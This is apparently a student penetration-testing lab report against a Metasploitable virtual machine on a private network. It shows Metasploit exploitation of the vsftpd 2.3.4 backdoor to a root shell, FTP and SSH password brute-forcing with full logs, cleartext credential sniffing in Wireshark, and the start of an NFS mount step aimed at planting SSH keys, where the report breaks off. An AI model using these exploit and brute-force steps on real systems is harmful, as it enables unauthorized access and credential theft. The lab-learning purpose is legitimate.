

NETWORK SECURITY PROJECT - MILESTONE 2

S/N	Service	Task	Comment
1	FTP	Remote Code Execution	run id command and take screenshot
2	FTP	FTP Brute Force	show successful login in brute force screenshot
3	FTP	FTP Clear Text Capture	show wireshark capture with credentials in screenshot
4	SSH	SSH Brute Force	show successful login in brute force screenshot
5	SSH	SSH Cryptography Cracking	Different Technique, require security research
6	TELNET	Telnet Brute Force	show successful login in brute force screenshot
7	TELNET	Telnet Clear Text Capture	show wireshark capture with credentials in screenshot
8	SAMBA	Remote Code Execution	run id command and take screenshot
9	JAVARMI	Remote Code Execution	run id command and take screenshot
10	POSTGRES	Remote Code Execution	run id command and take screenshot
11	UNREAL IRC	Remote Code Execution	run id command and take screenshot
12	DISTCC	Remote Code Execution	run id command and take screenshot
13	RLOGIN	Brute Force	Different Technique, require security research
14	Bindshell	Remote Code Execution	run id command and take screenshot
15	ProFTP	Brute Force	show successful login in brute force screenshot
16	VNC	Brute Force	show successful login in brute force screenshot
17	Tomcat	Brute Force	show successful login in brute force screenshot
18	MYSQL	Brute Force	show successful login in brute force screenshot
19	SMTP	User Enumeration	Different Technique, require security research
20	NFS	Previlege Esc and SSH login	Different Technique, require security research
21	RSH	Remote Code Execution	run id command and take screenshot
22	PHP	Remote Code Execution	run id command and take screenshot

Metasploit server ip: **192.168.56.105**

```
msfadmin@metasploitable:~$ ifconfig
eth0      Link encap:Ethernet HWaddr 08:00:27:fd:5b:aa
          inet addr:192.168.56.105  Bcast:192.168.56.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fed:5baa/64 Scope:Link
             UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
             RX packets:1423893 errors:0 dropped:0 overruns:0 frame:0
             TX packets:1204020 errors:0 dropped:0 overruns:0 carrier:0
             collisions:0 txqueuelen:1000
             RX bytes:135460157 (129.1 MB)  TX bytes:103203238 (98.4 MB)
             Base address:0xd020  Memory:f1200000-f1220000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
             UP LOOPBACK RUNNING  MTU:16436  Metric:1
             RX packets:6453 errors:0 dropped:0 overruns:0 frame:0
             TX packets:6453 errors:0 dropped:0 overruns:0 carrier:0
             collisions:0 txqueuelen:0
             RX bytes:3123125 (2.9 MB)  TX bytes:3123125 (2.9 MB)
```

With the nmap scan the following services on each port is shown,

```
Nmap scan report for 192.168.56.105
Host is up (0.00069s latency).
Not shown: 977 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          vsftpd 2.3.4
22/tcp    open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet       Linux telnetd
25/tcp    open  smtp         Postfix smtpd
53/tcp    open  domain       ISC BIND 9.4.2
80/tcp    open  http         Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec         netkit-rsh rexecd
513/tcp   open  login        login
514/tcp   open  shell        Netkit rshd
1099/tcp  open  java-rmi   GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs          2-4 (RPC #100003)
2121/tcp  open  ftp          ProFTPD 1.3.1
3306/tcp  open  mysql        MySQL 5.0.51a-3ubuntu5
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc          VNC (protocol 3.3)
6000/tcp  open  X11          (access denied)
6667/tcp  open  irc          UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http         Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:FD:5B:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.60 seconds
```

1. FTP - Remote code execution

For ftp, we have version as **vsftpd** in the above scan. Using **Metasploit** i have searched if any exploit module is present and the below screenshot you can see that one module is shown with the same version vsftpd 2.3.4 as the above scan. With exploit **exploit/unix/ftp/vsftpd_234_backdoor**, the remote access is gained here.

```
msf5 > search vsftpd

Matching Modules
=====
#  Name                                     Disclosure Date  Rank    Check  Description
-  ---
0  exploit/unix/ftp/vsftpd_234_backdoor   2011-07-03      excellent  No    VSFTPD v2.3.4 Backdoor Command Execution
```

For gaining access, using the above module with the command,

Syntax: use `version_name`

It takes inside the exploit module and allows to search for its properties like exploit name, license, platform name, port number & host name of target machine.

For basic settings we can use **show options** command to know target port number and hostname with the hostname set using **set target_ip** command.

```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):
=====
Name  Current Setting  Required  Description
----  -----  -----
RHOSTS  192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT   21            yes        The target port (TCP)

Exploit target:
Id  Name
--  --
0  Automatic
```

For advanced options, i used command **show advanced** which showcases the below listed advanced options for this module. We can configure the below options accordingly.

```

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show advanced
Module advanced options (exploit/unix/ftp/vsftpd_234_backdoor):

Name          Current Setting  Required  Description
----          -----
CHOST          no             The local client address
CPORT          no             The local client port
ConnectTimeout 10            yes          Maximum number of seconds to establish a TCP connection
ContextInformationFile no           The information file that contains context information
DisablePayloadHandler false        no             Disable the handler code for the selected payload
EnableContextEncoding false        no             Use transient context when encoding payloads
Proxies         no             A proxy chain of format type:host:port[,type:host:port][ ... ]
SSL             false          no             Negotiate SSL/TLS for outgoing connections
SSLCipher       no             String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode   PEER          no             SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion      Auto           yes            Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE         false          no             Enable detailed status messages
WORKSPACE       no             Specify the workspace for this module
WfsDelay        0              no             Additional delay when waiting for a session

Payload advanced options (cmd/unix/interact):

Name          Current Setting  Required  Description
----          -----
AutoRunScript  no             A script to run automatically on session creation.
CommandShellCleanupCommand no           A command to run before the session is closed
CreateSession   true           no             Create a new session for every successful login
InitialAutoRunScript no           An initial script to run on session creation (before AutoRunScript)
VERBOSE         false          no             Enable detailed status messages
WORKSPACE       no             Specify the workspace for this module

```

Activate Windows

Now setting **VERBOSE true** and give **run**. Verbose is a flag which can help us giving more information on the exploit. Using run command, we enter into a shell gaining access to server **192.168.56.105** through this exploit.

OUTPUT: We have gained access to remote server using ftp exploit and successfully executed commands to get root user if.

```

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set VERBOSE true
VERBOSE => true
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show advanced
Module advanced options (exploit/unix/ftp/vsftpd_234_backdoor):

Name          Current Setting  Required  Description
----          -----
CHOST          no             The local client address
CPORT          no             The local client port
ConnectTimeout 10            yes          Maximum number of seconds to establish a TCP connection
ContextInformationFile no           The information file that contains context information
DisablePayloadHandler false        no             Disable the handler code for the selected payload
EnableContextEncoding false        no             Use transient context when encoding payloads
Proxies         no             A proxy chain of format type:host:port[,type:host:port][ ... ]
SSL             false          no             Negotiate SSL/TLS for outgoing connections
SSLCipher       no             String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode   PEER          no             SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion      Auto           yes            Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE         true           no             Enable detailed status messages
WORKSPACE       no             Specify the workspace for this module
WfsDelay        0              no             Additional delay when waiting for a session

Payload advanced options (cmd/unix/interact):

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----          -----
AutoRunScript  no             A script to run automatically on session creation.
CommandShellCleanupCommand no           A command to run before the session is closed
CreateSession   true           no             Create a new session for every successful login
InitialAutoRunScript no           An initial script to run on session creation (before AutoRunScript)
VERBOSE         true           no             Enable detailed status messages
WORKSPACE       no             Specify the workspace for this module

```

Activate Windows

Now, we enter into shell and execute the basic shell commands like id to know id and password, ls to list files, cd to change directory and list files under that. Similarly can perform copy, paste, move and also edit the files that is unauthorised activity.

OUTPUT: Below we can see the command **id** used to get **root user**, **ls** lists files and **cd root** - we go to root and list files under that path.

```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.56.105:21 - Banner: 220 (vsFTPD 2.3.4)
[*] 192.168.56.105:21 - USER: 331 Please specify the password.
[+] 192.168.56.105:21 - Backdoor service has been spawned, handling ...
[+] 192.168.56.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 3 opened (192.168.56.101:40635 → 192.168.56.105:6200) at 2020-05-17 06:34:30 -0400

id
uid=0(root) gid=0(root)
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
cd root
ls
```

2. FTP - Brute Force

To break the ftp authentication we search the modules in ftp and for authentication, we use **ftp_login** which shows the module. Using this module, we set configurations under options given and run the module with modified settings.

```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > search ftp_login

Matching Modules
=====
#  Name                               Disclosure Date  Rank   Check  Description
-  ----
0  auxiliary/scanner/ftp/ftp_login      normal        No     FTP Authentication Scanner
```

Created a user and password text files taking list from **github** in desktop. Now under the options, we set these files to USER_FILE and PASS_FILE accordingly with the user and common password list we found. Below the hostname is also set to server ip and port is already displayed for ftp as 21.

```
msf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.105
msf5 auxiliary(scanner/ftp/ftp_login) > set USER_FILE ~/Desktop/user.txt
USER_FILE => ~/Desktop/user.txt
msf5 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE ~/Desktop/pass.txt
PASS_FILE => ~/Desktop/pass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):
Name          Current Setting  Required  Description
----          -----          -----      -----
BLANK_PASSWORDS  false          no         Try blank passwords for all users
BRUTEFORCE_SPEED 5              yes        How fast to bruteforce, from 0 to 5
DB_ALL_CREDS    false          no         Try each user/password couple stored in the current database
DB_ALL_PASS     false          no         Add all passwords in the current database to the list
DB_ALL_USERS    false          no         Add all users in the current database to the list
PASSWORD        no             no         A specific password to authenticate with
PASS_FILE       ~/Desktop/pass.txt  no         File containing passwords, one per line
Proxies          no             no         A proxy chain of format type:host:port[,type:host:port][ ... ]
RECORD_GUEST    false          no         Record anonymous/guest logins to the database
RHOSTS          192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT           21             yes        The target port (TCP)
STOP_ON_SUCCESS false          yes        Stop guessing when a credential works for a host
THREADS         1              yes        The number of concurrent threads (max one per host)
USERNAME        no             no         A specific username to authenticate as
USERPASS_FILE   no             no         File containing users and passwords separated by space, one pair per line
USER_AS_PASS    false          no         Try the username as the password for all users
USER_FILE       ~/Desktop/user.txt  no         File containing usernames, one per line
VERBOSE         true           yes        Whether to print output for all attempts
```

Now, after setting the files, i run to check for any successful login that is captured. It basically runs a **brute force** attack , i.e., with the provided user names and password, 1 user name is taken and run across all passwords.

Here i have provided 22 user names and 22 common passwords taken from github and each user name is tried for 22 passwords. So on a total we try 484 times to find a successful login. We can also stop if one successful login is found instead of going for 484 times and try logging in with the found credentials.

```

msf5 auxiliary(scanner/ftp/ftp_login) > run

[*] 192.168.56.105:21      - 192.168.56.105:21 - Starting FTP login sweep
[!] 192.168.56.105:21      - No active DB -- Credential data will not be saved!
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:123456 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:msfadmin (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:user (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:password (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:123456789 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:123445 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:1234567 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:dragon (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:123123 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:baseball (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:abc123 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:football (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:monkey (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:letmein (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:696969 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:shadow (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:master (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:666666 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: msfadmin:123456 (Incorrect: )
[+] 192.168.56.105:21      - 192.168.56.105:21 - Login Successful: msfadmin:msfadmin
[+] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: user:123456 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: user:msfadmin (Incorrect: )
[+] 192.168.56.105:21      - 192.168.56.105:21 - Login Successful: user:user
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: super_admin:123456 (Incorrect: )
[-] 192.168.56.105:21      - 192.168.56.105:21 - LOGIN FAILED: super_admin:msfadmin (Incorrect: )

```

OUTPUT: for the below credentials, i get successful login by Brute forcing :

- user name: msfadmin and Password: msfadmin
- user name: user and password: user

with these credentials, i can have a successful logins.

```

msf5 auxiliary(scanner/ftp/ftp_login) > ftp 192.168.56.105
[*] exec: ftp 192.168.56.105

Connected to 192.168.56.105.
220 (vsFTPd 2.3.4)
Name (192.168.56.105:kali): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

```

```

msf5 auxiliary(scanner/ftp/ftp_login) > ftp 192.168.56.105
[*] exec: ftp 192.168.56.105

Connected to 192.168.56.105.
220 (vsFTPd 2.3.4)
Name (192.168.56.105:kali): user
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

```

3. FTP - Clear text capture (captured in Wireshark)

Through **ftp**, i can connect to the server using credentials **username - msfadmin** and **password - msfadmin** which gives me a successful login into a shell console.

In that, i can use my basic shell commands and execute them for the results i needed to be displayed.

Now a network attacker can perform a **man in the middle** attack and can use **wireshark** to capture the data packets sent from user to the server. Thus he may get the **credentials in clear** and also whatever user is executing using shell commands.

```
root@kali:/# ftp 192.168.56.105
Connected to 192.168.56.105.
220 (vsFTPd 2.3.4)
Name (192.168.56.105:kali): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x  6 1000      1000  4096 Apr 28  2010 vulnerable
226 Directory send OK.
ftp> exit
221 Goodbye.
root@kali:/# ftp 192.168.56.105
Connected to 192.168.56.105.
220 (vsFTPd 2.3.4)
Name (192.168.56.105:kali): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd root
550 Failed to change directory.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x  6 1000      1000  4096 Apr 28  2010 vulnerable
226 Directory send OK.
ftp> cd vulnerable
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.

150 Here comes the directory listing.
drwxr-xr-x  3 1000      1000  4096 Apr 28  2010 mysql-ssl
drwxr-xr-x  5 1000      1000  4096 Apr 28  2010 samba
drwxr-xr-x  2 1000      1000  4096 Apr 19  2010 tikiwiki
drwxr-xr-x  3 1000      1000  4096 Apr 16  2010 twiki20030201
226 Directory send OK.
```

By wireshark, the below screenshot shows the captured packets,

tcp.stream eq 0						
No.	Time	Source	Destination	Protocol	Length	Info
4	2,996287166	192.168.56.105	192.168.56.101	TCP	74	21 → 50464 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=656288
5	2,996359313	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=890380274 TSecr=6562881
6	2,911192190	192.168.56.105	192.168.56.101	FTP	86	Response: 220 (vsFTPd 2.3.4)
7	2,911173615	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=1 Ack=21 Win=64256 Len=0 TSval=890380278 TSecr=6562882
8	9,833208392	192.168.56.101	192.168.56.105	FTP	81	Request: USER msfadmin
9	9,833885858	192.168.56.105	192.168.56.101	TCP	66	21 → 50464 [ACK] Seq=21 Ack=16 Win=5792 Len=0 TSval=6563574 TSecr=890387200
10	9,834459300	192.168.56.105	192.168.56.101	FTP	100	Response: 331 Please specify the password.
11	9,834500956	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=16 Ack=55 Win=64256 Len=0 TSval=890387202 TSecr=6563574
12	14,660960495	192.168.56.101	192.168.56.105	FTP	81	Request: PASS msfadmin
13	14,666106894	192.168.56.105	192.168.56.101	FTP	89	Response: 230 Login successful.
14	14,666154172	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=31 Ack=78 Win=64256 Len=0 TSval=890392033 TSecr=6564057
15	14,666399435	192.168.56.101	192.168.56.105	FTP	72	Request: SYST
16	14,667200948	192.168.56.105	192.168.56.101	FTP	85	Response: 215 UNIX Type: L8
17	14,667236146	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=37 Ack=97 Win=64256 Len=0 TSval=890392034 TSecr=6564058
20	25,412342615	192.168.56.101	192.168.56.105	FTP	76	Request: CWD root
21	25,413166487	192.168.56.105	192.168.56.101	FTP	99	Response: 550 Failed to change directory.
22	25,413211782	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=47 Ack=130 Win=64256 Len=0 TSval=890402780 TSecr=6565132
25	30,959745027	192.168.56.101	192.168.56.105	FTP	95	Request: PORT 192,168,56,101,149,147
26	30,966865723	192.168.56.105	192.168.56.101	FTP	117	Response: 200 PORT command successful. Consider using PASV.
27	30,966862173	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=76 Ack=181 Win=64256 Len=0 TSval=890408328 TSecr=6565687
28	30,961393973	192.168.56.101	192.168.56.105	FTP	72	Request: LIST
32	30,963388148	192.168.56.105	192.168.56.101	FTP	105	Response: 150 Here comes the directory listing.
33	30,963433823	192.168.56.101	192.168.56.105	TCP	66	50464 → 21 [ACK] Seq=82 Ack=220 Win=64256 Len=0 TSval=890408331 TSecr=6565687
39	30,965229431	192.168.56.105	192.168.56.101	FTP	90	Response: 226 Directory send OK.

▶ Frame 3: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface eth0, id 0
 ▶ Ethernet II, Src: PcsCompu_1f:30:76 (08:00:27:1f:30:76), Dst: PcsCompu_fd:5b:aa (08:00:27:fd:5b:aa)
 ▶ Internet Protocol Version 4, Src: 192.168.56.101, Dst: 192.168.56.105
 ▶ Transmission Control Protocol, Src Port: 50464, Dst Port: 21, Seq: 0, Len: 0

0000 08 00 27 fd 5b aa 08 00 27 1f 30 76 08 00 45 00 0v..E
 0010 00 3c 2d b2 40 00 40 01 1a eb c9 a8 38 65 c0 a8 < - @ Be.
 0020 38 69 c5 29 00 15 9e 16 18 d2 00 00 00 a0 02 81
 0030 fa f0 f2 4d 00 00 02 04 05 b4 04 02 08 0a 35 12 . . M 5
 0040 1f f1 00 00 00 00 01 03 03 07

Activate Windows
Go to PC settings to activate

_packets: 64 · Displayed: 40 (62.5%)

Here under the **Protocol** there is ftp that we are using to connect to server. Now i by clicking 1 packet and giving **tcp follow stream**, it gives a result of everything i executed starting from login till end by combining all packets in that stream below,

Wireshark - Follow TCP Stream (tcp.stream eq 0) - eth0

```

220 (vsFTPd 2.3.4)
USER msfadmin
331 Please specify the password.
PASS msfadmin
230 Login successful.
SYST
215 UNIX Type: L8
CWD root
550 Failed to change directory.
PORT 192,168,56,101,149,147
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
CWD vulnerable
250 Directory successfully changed.
PORT 192,168,56,101,178,219
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
CWD mysql-ssl
550 Failed to change directory.

```

OUTPUT: Captured user id and password in clear text in wireshark and also some commands executed inside shell giving out results of files listed.

4. SSH - Brute Force

The modules present for SSH to break the authentication are

```
msf5 > search ssh_login
Matching Modules
=====
#  Name                                     Disclosure Date  Rank   Check  Description
-  --
0  auxiliary/scanner/ssh/ssh_login          normal        No    SSH Login Check Scanner
1  auxiliary/scanner/ssh/ssh_login_pubkey   normal        No    SSH Public Key Login Scanner
```

There are 2 modules, `ssh_login` and `ssh_login_pubkey`. Checking for the 1st module, and modifying the configurations under options. The RHOSTS is set to ip **192.168.56.105**, the USER_FILE and PASS_FILE are set to the **user.txt** and **pass.txt** which has names and passwords listed i created. The port name is already shown as **22** for SSH. Also setting the **BRUTEFORCE_SPEED** to lowest to fasten the attack and **VERBOSE** set to **true**.

To stop after 1 successful login we have set **stop_on_success** to **true**.

The below screenshot shows all options after modified.

```
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name      Current Setting  Required  Description
----      -----          ----- 
BLANK_PASSWORDS  false       no        Try blank passwords for all users
BRUTEFORCE_SPEED  2          yes      How fast to bruteforce, from 0 to 5
DB_ALL_CREDS     false       no        Try each user/password couple stored in the current database
DB_ALL_PASS      false       no        Add all passwords in the current database to the list
DB_ALL_USERS     false       no        Add all users in the current database to the list
PASSWORD         no          no        A specific password to authenticate with
PASS_FILE        ~/Desktop/pass.txt  no        File containing passwords, one per line
RHOSTS           192.168.56.105 yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT            22          yes      The target port
STOP_ON_SUCCESS  true        yes      Stop guessing when a credential works for a host
THREADS          1           yes      The number of concurrent threads (max one per host)
USERNAME         no          no        A specific username to authenticate as
USERPASS_FILE    no          no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS     false       no        Try the username as the password for all users
USER_FILE        ~/Desktop/user.txt  no        File containing usernames, one per line
VERBOSE          true        yes      Whether to print output for all attempts
```

After running with modified configurations, the user names are checked individually against every password for successful and failed logins. Thus, **brute force** is performed and we get the below,

```

msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.56.105:22 - Failed: 'admin:123456'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.105:22 - Failed: 'admin:msfadmin'
[-] 192.168.56.105:22 - Failed: 'admin:user'
[-] 192.168.56.105:22 - Failed: 'admin:password'
[-] 192.168.56.105:22 - Failed: 'admin:qwerty'
[-] 192.168.56.105:22 - Failed: 'admin:123456789'
[-] 192.168.56.105:22 - Failed: 'admin:123445'
[-] 192.168.56.105:22 - Failed: 'admin:1234'
[-] 192.168.56.105:22 - Failed: 'admin:admin'
[-] 192.168.56.105:22 - Failed: 'admin:1234567'
[-] 192.168.56.105:22 - Failed: 'admin:dragon'
[-] 192.168.56.105:22 - Failed: 'admin:123123'
[-] 192.168.56.105:22 - Failed: 'admin:baseball'
[-] 192.168.56.105:22 - Failed: 'admin:abc123'
[-] 192.168.56.105:22 - Failed: 'admin:football'
[-] 192.168.56.105:22 - Failed: 'admin:monkey'
[-] 192.168.56.105:22 - Failed: 'admin:letmein'
[-] 192.168.56.105:22 - Failed: 'admin:696969'
[-] 192.168.56.105:22 - Failed: 'admin:shadow'
[-] 192.168.56.105:22 - Failed: 'admin:master'
[-] 192.168.56.105:22 - Failed: 'admin:666666'
[-] 192.168.56.105:22 - Failed: 'admin:qwerty'
[-] 192.168.56.105:22 - Failed: 'msfadmin:123456'
[+] 192.168.56.105:22 - Success: 'msfadmin:msfadmin' ''
[*] Command shell session 3 opened (192.168.56.101:40347 → 192.168.56.105:22) at 2020-05-17 09:55:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

We get 1st successful login and the execution gets stopped and wont go further. So using **sessions** we can know the active sessions with user id and password and particularly we can login to that successful id and password we got above by

Syntax: sessions -i Id_no

And specify **Id_no** to 1.

```

msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
=====

```

Id	Name	Type	Information	Connection
1	shell	unknown	SSH msfadmin:msfadmin (192.168.56.105:22)	192.168.56.101:33651 → 192.168.56.105:22 (192.168.56.105)
2	shell	unknown	SSH user:user (192.168.56.105:22)	192.168.56.101:46581 → 192.168.56.105:22 (192.168.56.105)
3	shell	unknown	SSH msfadmin:msfadmin (192.168.56.105:22)	192.168.56.101:40347 → 192.168.56.105:22 (192.168.56.105)

```

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1 ...

ls
vulnerable
cd vulnerable
ls
mysql-ssl
samba
tikiwiki
twiki20030201
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin)
,119(sambashare),1000(msfadmin)
Activate Windows
Go to PC settings to activate Windows.

```

OUTPUT: Through the module, we modified certain configuration settings and set user id and common password files to run a brute force attack on **ssh module**. Hence, got a successful login and executed few shell commands like **Id** which gives root user and **ls** command to list files etc.,

5. SSH - Cryptography Cracking

One of the most reliable ways to gain SSH access to servers is by brute-forcing credentials. There are a few methods of performing an SSH brute-force attack that will ultimately lead to the discovery of valid login credentials. We can crack passwords in different ways

SSH logging by creating own ssh password:

For SSH login, if we know the password then we can gain access to remote system. Without key, we can generate a new key and append to **authorized_keys**. Thus we create own SSH keys and append the newly created public key into the **authorized_key** of the victim user. Then log into the remote host with the victim user and own password.

- We create a new directory **direc_1** under /tmp and now we mount our **/home** to the newly created directory by the following syntax,

Syntax: **mount -t nfs 192.168.100.25:/home /tmp/direc_1**

-t: Specifies the type of file system that performs the logical mount request. The NFS parameter must be used.

```
root@kali:~# showmount -e 192.168.56.105
Export list for 192.168.56.105:
/
root@kali:~# mkdir /tmp/direc_1
root@kali:~# mount -t nfs 192.168.56.105:/home /tmp/direc_1
```

- Now we go to /tmp/direc_1 directory and list the content. The content listed are from /home folder of the remote host. Then we can find the **.ssh** folder inside **msfadmin** folder.

```

root@kali:/# cd /tmp/direc_1
root@kali:/tmp/direc_1# ls -al
total 1172
drwxr-xr-x  6 root  root        4096 May  5 21:25 .
drwxrwxrwt 19 root  root        4096 May 20 10:50 ..
-rwsr-sr-x  1 root  root     1168776 May  5 21:25 bash
drwxr-xr-x  2 root nogroup    4096 Mar 17 2010 ftp
drwxr-xr-x  7 kali  kali      4096 May  4 06:25 msfadmin
drwxr-xr-x  2 1002   1002      4096 Apr 16 2010 service
drwxr-xr-x  3 1001   1001      4096 May  7 2010 user
root@kali:/tmp/direc_1# cd msfadmin/
root@kali:/tmp/direc_1/msfadmin# ls
vulnerable
root@kali:/tmp/direc_1/msfadmin# ls -al
total 44
drwxr-xr-x  7 kali  kali      4096 May  4 06:25 .
drwxr-xr-x  6 root  root      4096 May  5 21:25 ..
lrwxrwxrwx  1 root  root       9 May 14 2012 .bash_history → /dev/null
drwxr-xr-x  4 kali  kali      4096 Apr 17 2010 .distcc
drwx----- 2 kali  kali      4096 May  5 06:25 .gconf
drwx----- 2 kali  kali      4096 May  5 06:25 .gconfd
-rw----- 1 root  root     4174 May 14 2012 .mysql_history
-rw-r--r-- 1 kali  kali      586 Mar 16 2010 .profile
-rwx----- 1 kali  kali       4 May 20 2012 .rhosts
drwx----- 2 kali  kali      4096 May 17 2010 .ssh
